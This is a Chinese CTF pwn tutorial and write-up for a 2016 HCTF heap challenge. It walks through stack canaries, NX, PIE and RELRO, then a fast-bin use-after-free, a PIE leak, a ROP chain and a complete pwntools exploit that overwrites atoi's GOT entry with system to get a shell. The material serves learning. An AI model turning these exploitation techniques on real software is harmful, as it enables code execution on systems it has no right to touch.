见微知著(一)：解析ctf中的pwn--Fast bin里的UAF

　　在网上关于ctf pwn的入门资料和writeup还是不少的，但是一些过渡的相关知识就比较少了，大部分赛棍都是在不断刷题中总结和进阶的。所以我觉得可以把学习过程中的遇到的一些问题和技巧总结成文，供大家参考和一起交流。当然，也不想搞那些烂大街的东西，所以，打算从一道道pwn题开始，见微知著，在题目中延伸。

一：工欲善其事必先利其器

　　ubuntu14.01 64位(该版本对pwntools的支持最好)。

　　pwntools:用于快速编写pwn的exp的python库，功能非常强大。

　　IDA：二进制必备的工具，主要用来反汇编代码，以及初步调试。

　　libc-database：用于猜测libc.so.6库的工具，非常好用。(可以在github里面找)

　　ROPgaget：用于查找和生成ROP链。

　　gdb：虽然Linux肯定自带了，但还是说一下吧。

二：一道2016HCTF的UAFpwn题

　　　当然，拿到一个二进制文件，首先需要运行一下。看截图

　　

　　当然，很蛋疼的是这个输入设置的也是醉了，最好先把IDA打开，看一下怎么输入。可以看出，这个题目的输入逻辑还是挺简单的，根据套路，一般是在堆上搞问题。在进行分析之前，再利用checksec(pwntools自带了?)检查一下文件的属性。

　　嗯！先来介绍一下checksec检测的各个属性的作用：

三：checksec里的各个属性和含义

　　i:Stack Guard

　　最熟悉的就是Stack Guard了，最经典的防护措施，记得最早接触是在看《深入理解计算机系统》的时候，通过在栈中插入Canary(这有一个很洋气的中文名,金丝雀值，具体典故可以自行google额，不多废话了)，通过在return之前监测值是否变化来确定是否发生了栈溢出。对于canary，在windows上(GS机制)和Linux上的初始化还是有很大的差别的，Windows上的产生就不多加阐述了，大致是.data的头四个字节和esp进行异或操作生成的，这里主要讲一下Linux的Stack Guard。

　　先来看一段有canary的汇编代码。

  400610:       55                      push   %rbp
  400611:       48 89 e5                mov    %rsp,%rbp
  400614:       48 83 ec 30             sub    $0x30,%rsp
  400618:       89 7d dc                mov    %edi,-0x24(%rbp)
  40061b:       48 89 75 d0             mov    %rsi,-0x30(%rbp)
  40061f:       64 48 8b 04 25 28 00    mov    %fs:0x28,%rax  <- 插入canary值
  400626:       00 00
  400628:       48 89 45 f8             mov    %rax,-0x8(%rbp)
  40062c:       31 c0                   xor    %eax,%eax
  40062e:       48 8d 45 e0             lea    -0x20(%rbp),%rax
  400632:       48 89 c6                mov    %rax,%rsi
  400635:       bf 00 07 40 00          mov    $0x400700,%edi
  40063a:       b8 00 00 00 00          mov    $0x0,%eax
  40063f:       e8 cc fe ff ff          callq  400510 <__isoc99_scanf@plt>
  400644:       48 8d 45 e0             lea    -0x20(%rbp),%rax
  400648:       48 89 c7                mov    %rax,%rdi
  40064b:       e8 80 fe ff ff          callq  4004d0 <puts@plt>
  400650:       b8 00 00 00 00          mov    $0x0,%eax
  400655:       48 8b 55 f8             mov    -0x8(%rbp),%rdx  <- 检查canary值
  400659:       64 48 33 14 25 28 00    xor    %fs:0x28,%rdx
  400660:       00 00
  400662:       74 05                   je     400669 <main+0x59> # 0x400669
  400664:       e8 77 fe ff ff          callq  4004e0 <__stack_chk_fail@plt>
  400669:       c9                      leaveq
  40066a:       c3                      retq

　　可以看那两行表明为红色的汇编代码，可以发现canary就是fs:0x28的值了，在Linux中，glbc把fs指向tls，换句话说，canary的值在tls偏移0x28处，来看一下tls的数据结构

typedef struct
{
  void *tcb;        /* Pointer to the TCB.  Not necessarily the
               thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;        /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;   <- canary值，偏移位置0x28处
  uintptr_t pointer_guard;
  ......
} tcbhead_t;

　　其中tcbhead_t就是来描述tls的了，进程加载的过程中会调用arch_prctl系统调用来设置%fs的值，而canary的值则是在glibc的_dl_main和__libc_start_main函数中通过_dl_sysdep_start函数从内核获取的，说了这么多，就是想说，对canary的值进行猜测还是挺难的，绕过它的方法主流一般有两种，一种是step-by-step,还有一种是覆盖直接修改tls里的canary。当然，至于我说的绕过是正面刚，曲线救国的方法还是挺多的。以后的文章可能会就这个问题进行具体描述，这篇文章主要讲堆，就不继续扩展了。

　　ii:N^X

　　NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。绕过的最主流的方法就死ROP(return-orient-program)和JOP(Jump-orient-program)了，关于JOP，前一段时间打印了2010的那篇描述JOP的paper，但是这段时间到了考试周，也没空看(其实也是因为英文烂)。而且感觉在ctf中很少看见(当然，估计是刷题刷的少)，在Windows的exp上倒是经常混合使用。不过其实原理都差不多，在这个题中，会详细描述一下pwn使用ROP的一些套路。

　　iii:PIE

　　其实我还是喜欢叫ALSR(address space layout randomization)，无论如何，ALSR都是以页为单位的，所以在页中，位置不变，即可以修改最后一位进行绕过，这也是惯有套路了，这个题目就是通过这个手段来进行leak出进程的基地址。

　　iv:RELRO(Relocation Read Only)

　　gcc/linker/glibc dynamic-linker共同实现的,由linker指定binary的一块经过dynamic linker处理过 relocation之后的区域为只读。可以尽可能减少存储区可写地址的范围，但是............只要有可写的地方就有利用的机会。具体的实现可以参考  http://hardenedlinux.org/2016/11/25/RelRO.html。针对这一点，0cft2017里面的writeup有非常经典的利用

　　

四：分析和利用

　　静态分析代码怎么能少了IDA呢？把主要函数都起一个通俗易懂的名字，建立好核心的数据结构，理清具体的工作流程和堆的释放分配器情况(这个题目显然是在堆上搞问题)。先看一下得出的关键数据结构。

　　根据堆分配大小可以得出这个题目是关于块表分配的，关于堆分配的具体知识，可以去参考http://www.freebuf.com/articles/security-management/105285.html。而且在堆释放的时候的并没有必要的检查。所以完全可以试着去进行UAF。

　　UAF的基本流程是。malloc(sizeof(A))【A一般带函数指针】--->init(A)---->free(A)--->占位-->A的函数解引用，这个题目中，分配空间的途径只有一条，换句话说，这个问题的核心是如何将分配的数据覆盖到struct_str就好了，这里的方法很多种，在这里分享一种使用两种分配方式的方法(单纯一种也可以)，先看具体流程

　　为了完整性，粗略说一下fast bin的分配释放的方式。在fast bin中，是由单项链表连接起来的，每个chunk的pre_chunk指向之前回收的chunk，即回收的chunk出于链表头部，此时分配时也会从头部分配，这里值得补充的是fast bin在free的时候并不检查double free ，这样可以形成循环链表，循环链表可以有利于chunk循环利用，这个题目没必要这样，但可以了解一下，free(0)->free(1)->free(0)(本题并不使用该

使用该方法）。

　　

　　在本题中，先是malloc(chunk0)->malloc(chunk1),其中chunk1，chunk2都小于16个字节，即进入上图的第二种情况。再free(chunk1)->free(chunk0)，此时只要分配一个大小为0x20的buffer就可以覆盖chunk1了。但是，这里有一个问题，题目开了PIE，所以只能覆盖12位，这里可以在12位的范围里找呀找，翻到了put，此时rdi指向了该chunk的，delete(chunk1)可以直接将put的位置泄露出来，根据put的位置可以得到进程加载的基地址如图：

代码如下：

addr = u64(addr + '\x00' * (8 - len(addr))) - 0xd2d   #d2d是相对于基地址put的偏移

print 'mainBase:',
print hex(addr)

　　由于题中的二进制文件并没有system，所以需要在libc.so.6里拿到system的地址。这里有三种比较主流的方法可以得到chunk，如下：

五：得到libc.so.6 里的system的三种常用方法

　　1：利用libc-database

　　　　这一种是最简单暴力的，只要你有个足够大的libc-database就好了(其实我花了很长时间才明白这个道理的，之前都是慢慢leak出来的）。原理也很简单，就是记住每个版本的read，write, system, ”/bin/sh"的地址，由于地址随机化是以页为单位的，所以拿后12位，和自己leak出来的地址后12位对比，就可以得到用相应的版本，具体如下图：

　　

　　2：leakLib

　　　　当然之前一种方法并不一定凑效，万一平台的libc版本你database里没有就尴尬了，所以你需要另一个方法来解决这个问题，说到这里，不得不说pwntools这个神器了，里面有关于这个的函数，你所需要的就是得到可以任意读至少一个字节的漏洞，根据这个就可以直接直接得到systemde地址了，当然具体原理，值得用一篇的篇幅来细讲，和3一起留在下一篇文章继续说。

　　3：Return-to-dl_solve 　　　　

　　　　这个方法主要是利用自己伪造rel_entry，symtab，strtab，然后通过增大rel_offset来直接调用system函数，这种方法的原理和上一种方法一样，需要对PE文件格式有一定的了解才能彻底理解，详情放在下一篇。

六：编写Exploit

　　这个题目闲麻烦，就直接使用第一种了(毕竟打本地),后面两种方法就放在下一篇一起解决了。在编写exp之前，想介绍一下pwn的几个小技巧，

　　　　1>特别在堆上搞事情的pwn题，经常需要几个步才能实现一次分配或者释放，所以完全可以将封装成一个函数，还可以增加代码的可读性

　　　　2>合理使用  context()函数，gdb.attach()函数。这两个函数讷能够在调试中给予很大的便利,context(log_level='debug')可以输出运行过程中io交互的细节，而gdb.attach函数则是可以利用gdb调试，特别对于在Windows下习惯用OD的人来说，gdb并不是那么用户友好的，但是在很多场景下，gdb可能是唯一的选择，比如利用kgdb调试Linux内核，所以用好gdb还是很有必要的，至于怎么用的话，在实践中利用help，熟能生巧吧！

　　　　3>学会使用pwntools的各个函数，不得不说，pwntools里对很多pwn里经常使用的东西都进行高度封装了。

　　之前已经可以控制任意指针，并leak除了进程的加载基地址，现在完全可以leak其它的地址，再通过对比后12位，这样基本leak libc.so.6的地址了，这是说一下通用ROPgaget吧！

　　在64位程序中很蛋疼的一点是，它的参数优先放在寄存器中,顺序依次为rdi,rsi,rdx,rcx,r8,r9。而不是从栈中直接提取，这样的话就不能直接把参数放到栈上面了，这里需要我们来绕一个弯，这个弯就是利用pop rdi;ret。pop rsi;ret。pop rdx;ret。来解决。在题目中，可以通过ROPgaget来获取，但是程序中不一定能够直接得到，所以可以通过通用Gadget。

基本就是这一段代码，具体的描述请参考***********（文章没找到，最开始出现在乌云，到后到处转载，自己找一下应该就能找到了）

这是这个题目的ROP链

def creatROP():

    ropchain = p64(addr + 0x00000000000011e3) # pop rdi
    ropchain += p64(addr + 0x202070)# got@malloc
    ropchain += p64(addr + 0x0000000000000990)# plt@put
    ropchain += p64(addr + 0x00000000000011DA)# magic
    ropchain += p64(0)# rbx
    ropchain += p64(1)# rbp
    ropchain += p64(addr + 0x0000000000202058)# r12 -> rip got@read
    ropchain += p64(8)# r13 -> rdx
    ropchain += p64(addr + 0x0000000000202078)# r14 -> rsi got@atoi
    ropchain += p64(0)# r15 -> rdi
    ropchain += p64(addr + 0x00000000000011C0)# magic
    ropchain += 'a'*8*7
    ropchain += p64(addr + 0x0000000000000B65)# getInt
    ropchain = 'yes AAAA'+ropchain
    return ropchain

　　看起来很长，其实设计已经成为套路了，详情可以自己调试看看。这里设计很巧妙的有点是，atoi函数直接是吧输入字符串作为参数，这样的话可以直接覆盖为system的地址，然后不需要设置参数，直接调用前一个函数就可以了。

七：exp实现

#! /usr/bin/python
from pwn import *

# switches
DEBUG = 0
LOCAL = 1
VERBOSE = 1

# modify this
if LOCAL:
    target = process('./heap')
else:
    target = remote('119.28.62.216',10023)

if VERBOSE: context(log_level='debug')

def creatROP():
    ropchain = p64(addr + 0x00000000000011e3) # pop rdi
    ropchain += p64(addr + 0x202070)# got@malloc
    ropchain += p64(addr + 0x0000000000000990)# plt@put
    ropchain += p64(addr + 0x00000000000011DA)# magic
    ropchain += p64(0)# rbx
    ropchain += p64(1)# rbp
    ropchain += p64(addr + 0x0000000000202058)# r12 -> rip got@read
    ropchain += p64(8)# r13 -> rdx
    ropchain += p64(addr + 0x0000000000202078)# r14 -> rsi got@atoi
    ropchain += p64(0)# r15 -> rdi
    ropchain += p64(addr + 0x00000000000011C0)# magic
    ropchain += 'a'*8*7
    ropchain += p64(addr + 0x0000000000000B65)# getInt
    ropchain = 'yes AAAA'+ropchain
    return ropchain

def create(size, string):
    target.recvuntil('quit')
    target.sendline('create ')
    target.recvuntil('size:')
    target.sendline(str(size))
    target.recvuntil('str:')
    target.send(string)

def delete(id,payload='yes'):
    target.recvuntil('quit')
    target.sendline('delete ')
    target.recvuntil('id:')
    target.sendline(str(id))
    target.recvuntil('sure?:')
    target.sendline(payload)

if DEBUG: gdb.attach(target)

a = raw_input('go2?')
create(4, 'aaa\n')
#a = raw_input('go?')
create(4, 'aaa\n')
#delete(0)
delete(1)
delete(0)
#create(4, '\x00')
create(0x20, 'a' * 0x16 + 'lo' + '\x2d')
delete(1)

target.recvuntil('lo')
addr = target.recvline()
addr = addr[:-1]
put_addr = u64(addr + '\x00' * (8 - len(addr)))
print 'putBase:'+str(hex(put_addr))

addr = u64(addr + '\x00' * (8 - len(addr))) - 0xd2d
print 'mainBase:',

print hex(addr)

delete(0)
#create(4, '\x00')

payload1 = 'a' * 0x18 + p64(0x00000000000011DC + addr)
create(0x20,payload1)

ropchain = creatROP()
delete(1,ropchain)
addr = target.recvline()[:-1]
addr = u64(addr + '\x00' * (8 - len(addr)))
print "malloc_addr:",
print hex(addr)
addr = addr - 534112 + 288144(这里可能要自己修改基地址)
#addr = addr - 537984 + 283536
print 'System_addr:',
print hex(addr)
print 'LibBase:',
print hex(addr)

target.sendline(p64(addr)+'/bin/sh')
target.interactive()